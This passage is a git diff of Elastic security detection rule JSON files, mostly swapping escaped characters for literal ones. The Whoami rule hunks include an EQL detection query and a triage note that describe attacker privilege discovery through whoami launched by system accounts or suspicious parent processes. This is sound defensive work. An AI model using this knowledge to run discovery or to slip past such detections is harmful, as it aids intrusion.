"Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json index ea4ddfe1207..72c281494dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_105.json @@ -69,7 +69,7 @@ ], "risk_score": 47, "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json b/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json index 9091806674b..e07aa85114a 100644 --- a/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ee53d67a-5f0c-423c-a53c-8084ae562b5c_1.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json index 828f922cfe7..09176daf9fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json +++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_102.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json index 316fd5d3bbe..40990797ee3 100644 --- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json +++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_103.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json index 00fe4b417b0..396a1d44c33 100644 --- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json +++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_104.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json index 275caa1e278..b718c7c73b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json +++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json index 59aa9863edd..773f55ddde2 100644 --- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json +++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json index 93eb324cefa..bb6c7ad0cab 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json index b67ab7fc470..1b24da4f546 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json index ecb6d1764f5..318ffb6feeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json index 8c00a7a98c3..0dc5e8422d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json index 50e95e959d4..c38f238ec3a 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json index d8c725498d3..c6718a224ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json index 056c5e20fee..afce51dbf10 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json index e8174210ff8..62debe3bb8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json index 2a4e6f8460f..e36707f6098 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json index 5880b55eb5c..4cbbba1d8fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json index bc512d57662..70c74459dbd 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json @@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", @@ -78,7 +78,7 @@ ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json index 45acd3c8263..a936d32a4a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json @@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", @@ -78,7 +78,7 @@ ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json index 6e5b78e3c6c..675a23b8d5b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json @@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring 